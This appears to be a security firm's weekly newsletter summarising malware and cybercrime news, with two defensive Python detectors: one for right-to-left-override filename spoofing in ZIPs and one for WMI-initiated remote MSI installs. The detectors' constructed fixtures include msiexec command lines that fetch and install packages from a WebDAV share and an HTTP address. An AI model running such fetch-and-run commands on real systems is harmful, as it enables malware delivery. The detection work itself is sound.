Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Story #1: Leader of Incognito Dark Web Drugs Market Arrested
The alleged owner of the Incognito dark web marketplace, Rui-Siang Lin (23), was arrested at John F. Kennedy Airport in New York on May 18, 2024.
Top 3 takeaways:
- Incognito Market operated from October 2020, selling illegal narcotics online; it generated over $100 million in sales and moved more than 1,000 kilograms of various drugs.
- Law enforcement accessed three servers in July 2022 and August 2023, leading to the arrest. These servers contained extensive data on transactions, vendors, and customers.
- Lin faces charges for running a continuing criminal enterprise, narcotics conspiracy, money laundering, and selling adulterated medication. If convicted, he could receive a life sentence.
Story #2: GitHub and FileZilla Abused to Deliver Various Malware
Cybercriminals are abusing legitimate services and software such as GitHub and FileZilla to distribute malware, including stealers and banking trojans such as Atomic, Vidar, Lumma, and Octo.
Top 5 takeaways:
- These attacks impersonate legitimate software like 1Password, Bartender 5, and Pixelmator Pro.
- The campaign, known as GitCaught, involves creating fake profiles and repositories on GitHub to host counterfeit versions of well-known software, aiming to steal sensitive data from compromised devices.
- The links to these malicious files are spread through malvertising and SEO poisoning campaigns.
- The attackers, suspected to be Russian-speaking actors from the Commonwealth of Independent States (CIS), use FileZilla servers to manage and deliver the malware.
- The attacks are part of a larger campaign that has been active since at least August 2023, delivering various malware variants targeting Android, macOS, and Windows platforms.
Story #3: New Cyber Attack Exploits Unicode Trick to Deliver Malware via the Cloud
A new attack campaign called CLOUD#REVERSE uses legitimate cloud storage services like Google Drive and Dropbox to distribute malware.
Top 4 takeaways:
- The attackers start with a phishing email carrying a ZIP file. Inside is what appears to be a Microsoft Excel document but is actually an executable whose filename uses a Unicode right-to-left override character to reverse how its trailing characters are displayed, hiding the real .exe extension.
- This file drops multiple payloads, including VBScript and PowerShell scripts, to keep up the appearance of a legitimate document and establish persistence on the victim's system.
- These scripts interact with cloud services to download additional malicious files and execute commands, ultimately allowing for data exfiltration and sustained access to the compromised system.
- There is an increasing trend of threat actors exploiting legitimate services to avoid detection and the investigation into the scale of this campaign is ongoing.
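The filename trick above is easy to check for before a ZIP reaches a user. The script below is an added example, not code from the CLOUD#REVERSE report: it builds a constructed archive in memory containing one entry whose name carries the right-to-left override (U+202E, assumed here to be the character the campaign used), then reports how the name would be displayed versus the extension the OS actually acts on. The display logic is a deliberate simplification of the Unicode bidi algorithm that is accurate for the ASCII names this trick depends on.

```python
"""Detect Unicode right-to-left-override (RLO) filename spoofing in a ZIP.

Added example, not code from the CLOUD#REVERSE report. A file named
'report_' + U+202E + 'xslx.exe' is displayed by bidi-aware file managers
as 'report_exe.xlsx', but Windows executes it as an .exe.
"""
import io
import zipfile

# Bidirectional control characters that change how a name is displayed
# without changing the bytes the OS uses to pick a file handler.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE RLE PDF LRO RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI RLI FSI PDI
    "\u200e", "\u200f",                                # LRM RLM
}
RLO, PDF = "\u202e", "\u202c"


def displayed_name(name: str) -> str:
    """Approximate what the user sees: text after an RLO, up to a PDF or the
    end of the name, is rendered right-to-left (reversed). Other bidi
    controls are invisible. Simplified bidi handling, adequate for ASCII."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def real_extension(name: str) -> str:
    """Extension the OS actually acts on: control characters stripped,
    text after the last dot, lower-cased."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def inspect_zip(data: bytes) -> list:
    """Return one finding per archive entry whose name carries bidi controls."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            controls = sorted({f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS})
            if not controls:
                continue
            findings.append({
                "stored_name": name,
                "displayed_as": displayed_name(name),
                "real_extension": real_extension(name),
                "controls": controls,
            })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive (not from the campaign): one benign entry
    and one RLO-spoofed executable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "benign")
        zf.writestr("report_" + RLO + "xslx.exe", b"MZ...")  # fake PE stub
    return buf.getvalue()


if __name__ == "__main__":
    for f in inspect_zip(build_sample_zip()):
        print(f"{f['displayed_as']!r} is really a .{f['real_extension']} "
              f"(controls: {', '.join(f['controls'])})")
```

Running it reports that the entry displayed as 'report_exe.xlsx' is really an .exe. A mail gateway or sandbox that rejects any archive entry containing characters from BIDI_CONTROLS removes the whole class of lure, since no legitimate attachment name needs a bidi override.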
Story #4: China-Linked Hackers Rely on ORB Proxy Networks to Evade Detection
State-backed hackers, particularly those linked to China, increasingly route cyber espionage through large proxy infrastructures called Operational Relay Box (ORB) networks.
Top 5 takeaways:
- Independent cybercriminals manage these ORBs and provide access to multiple state-sponsored actors, such as APT5 and APT15.
- ORBs may include a mix of leased virtual private servers (VPS) and compromised devices, including outdated routers and IoT products.
- Using ORBs poses challenges in detection and attribution since the attack infrastructure is not directly controlled by the threat actors, who can switch between nodes across different locations.
- ORB networks like ORB3/SPACEHOP have been used to exploit critical vulnerabilities in Citrix ADC and Gateway, while others (e.g., ORB2/FLORAHOX) have been used to target critical infrastructure using SOHO equipment.
- Because nodes rotate frequently and are shared across actors, blocking or attributing on individual IP addresses is far less effective against ORB traffic than against actor-owned infrastructure.
Story #5: Latrodectus Malware Becomes IcedID’s Successor in Phishing Campaigns
A new malware loader, Latrodectus, has been identified as a successor to the IcedID malware. It’s being distributed through email phishing campaigns that started in early March 2024.
Top 4 takeaways:
- The campaigns use oversized JavaScript files (padded to a size large enough to evade some scanners) that use Windows Management Instrumentation (WMI) to install a remotely hosted MSI file from a WebDAV share.
- Latrodectus can deploy additional payloads like QakBot, DarkGate, and PikaBot, enabling various post-exploitation activities. It has self-delete techniques, source code obfuscation, and anti-analysis checks to evade detection.
- The malware establishes persistence via scheduled tasks and communicates with a C2 server over HTTPS to receive commands for data collection, updates, and execution of malicious files.
- It is important to remain vigilant about the continuous evolution of malware-as-a-service (MaaS) and social engineering tactics.
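The WMI-initiated MSI install described above has a detection wrinkle worth showing: because the install request goes through WMI, msiexec.exe is spawned by WmiPrvSE.exe rather than by the script host, so a simple wscript-to-msiexec parent-child rule misses it. The script below is an added example, not from any vendor report or product, and the process-creation events it inspects are constructed in the shape of Sysmon Event ID 1 (pids, paths and the 203.0.113.0/24 documentation addresses are all invented). It flags any msiexec install whose package comes from a UNC/WebDAV path or URL, and raises severity when WMI or a script host appears in the ancestry.

```python
"""Flag msiexec installs sourced from WebDAV or other remote locations,
including the WMI-initiated variant described for Latrodectus.
Added example; events below are constructed, not real telemetry."""
import re

# Constructed sample events (pid/ppid chosen for illustration; 203.0.113.0/24
# is a documentation range).
EVENTS = [
    {"pid": 4120, "ppid": 3000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\bob\Downloads\Document_0318.js"'},
    {"pid": 4188, "ppid": 1288, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    # WMI-initiated install: parent is WmiPrvSE, not the script host
    {"pid": 4240, "ppid": 4188, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i \\203.0.113.10@80\DavWWWRoot\share\test.msi /qn"},
    # Ordinary local install by an admin; should not alert
    {"pid": 4300, "ppid": 2000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\bob\Downloads\7z2405-x64.msi" /qn'},
    # Direct child of the script host pulling an MSI over HTTP
    {"pid": 4350, "ppid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://203.0.113.10/test.msi /qn"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# \\host\share, \\host@80\..., \\host@SSL\... (WebDAV port/SSL syntax)
UNC = re.compile(r'\\\\[^\\\s"]+\\', re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
MSI_ARG = re.compile(r'/(?:i|package)\s+"?([^"\s]+)', re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def msi_source(cmdline):
    """Package path passed to msiexec /i or /package, or '' if none."""
    m = MSI_ARG.search(cmdline)
    return m.group(1) if m else ""


def is_remote(source):
    s = source.lower()
    return bool(UNC.match(s) or URL.match(s) or "davwwwroot" in s)


def ancestry(event, by_pid):
    """Image names from the event up through known parents: [self, parent, ...]."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Return alerts for msiexec installs from remote sources, raised to
    'high' when WMI or a script host appears in the ancestry."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev["image"]) != "msiexec.exe":
            continue
        src = msi_source(ev["cmdline"])
        if not src or not is_remote(src):
            continue
        chain = ancestry(ev, by_pid)
        reasons = [f"msiexec installing from remote source {src}"]
        severity = "medium"
        if len(chain) > 1 and chain[1] == "wmiprvse.exe":
            severity = "high"
            reasons.append("spawned by WmiPrvSE.exe (WMI-initiated install)")
        if any(p in SCRIPT_HOSTS for p in chain[1:]):
            severity = "high"
            reasons.append("script host in process ancestry")
        alerts.append({"pid": ev["pid"], "severity": severity,
                       "source": src, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["pid"], a["severity"], a["source"], "; ".join(a["reasons"]))
```

On the sample, the local 7-Zip install stays quiet while both remote installs alert at high severity, the WMI one because of its WmiPrvSE.exe parent. Real telemetry will include legitimate remote MSI installs from software deployment shares, so tune the UNC check to exclude your own distribution servers rather than dropping the remote-source condition.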
Top Tips of the Week
Threat Intelligence
- Conduct threat intelligence simulations. Practice scenarios to improve skills and readiness for real-world threats.
- Integrate CTI into threat intelligence platforms (TIPs). Streamline workflows for efficient data collection and analysis.
- Foster a threat intelligence culture. Ensure that all team members understand the value and application of threat intelligence.
Threat Hunting
- Implement a threat intelligence sharing agreement with trusted partners. External collaboration enhances overall capabilities.
- Share findings with the cybersecurity community. Collective insights strengthen everyone’s ability to respond to cyber threats.
- Use CTI to enhance threat hunting. Combine proactive and reactive strategies for a comprehensive security approach.
Custom Tooling
- Consider the maintainability of custom tools. Create solutions that are easy to update, modify, and adapt to changing requirements.
Feature Article
Crown Jewel Analysis teaches you what to protect and how to protect it. This fundamental risk management methodology has been used for decades to help organizations determine what is important to them and where to prioritize their resources to defend against cyber attacks.
This guide delves into this risk management methodology to show how to use it today. It explores Crown Jewel Analysis, its benefits, and how to perform it. There are also recommendations for tools to help you use this methodology in the real world and practical examples to show how to secure a fictitious hair salon against cyber threats.
Let’s jump in and learn Crown Jewel Analysis so you can focus on defending what is most important to your business today!
Learning Resources
Antisyphon Active Defense & Cyber Deception on YouTube
Antisyphon Training has released John Strand’s Active Defense & Cyber Deception course on YouTube for free! This excellent course covers how to force an attacker to make moves in your environment that allow you to detect, contain, and perform attribution more effectively.
A course you don’t want to miss if you work in cyber threat intelligence.
A Notion Template to Keep You on Track with Your Goals
If your weeks are chaotic, unstructured, and need organizing, this Notion template is for you.
Deya walks you through a comprehensive template she built to keep track of her $100K+ business and ensure she aligns her work with her goals. It is an excellent resource for planning your week and is completely free.
Not Getting What You Want? You Are Probably Not Good Enough
In this inspiring video, Alex Hormozi discusses what he sees as holding back many aspiring employees, leaders, and entrepreneurs… using bias as an excuse.
He highlights how many people use bias as a placeholder for why they are not getting a job, a promotion, or landing a business client. Instead, we need to accept that we might not be good enough yet and become so good that people can't ignore us.
The Traffic Light Protocol Applied to Microsoft 365
This excellent demonstration by Johnathan Edwards shows how you can use data sensitivity labels in Microsoft 365 to better classify, protect, and monitor your organization’s information using the Traffic Light Protocol (TLP).
He shows you how to set it all up and bring more control to your Microsoft environment.
Personal Notes
🤔 Project management has been the name of the game at Kraven this week. We have assessed several options, including Notion, Microsoft Planner, and ClickUp.
Notion is our current solution for managing our content, coaching calls, and course creation. It’s a great platform but lacks some of the accountability, collaboration, and automation features that other tools like Asana and ClickUp have built in. That said, its flexibility and powerful templates are features no other platform has.
Microsoft Planner has awesome interoperability with other Microsoft 365 tools like Todo, Teams, and Outlook. However, it lacks many advanced project management features such as dependencies, comments on tasks, time tracking, etc.
ClickUp is a relatively new contender for us. We have used it with clients in the past and found it easy to use, feature-rich, and very powerful thanks to its comprehensive list of automations and integrations. We plan to trial this platform over the next month to see how it holds up with our team's workload and whether it can help us streamline our processes.
If you plan on using a project management tool, I hope this brief analysis helps you get started. As always, have a fantastic weekend and maximize the learning resources, especially the free Active Defense & Cyber Deception course on YouTube. It’s great.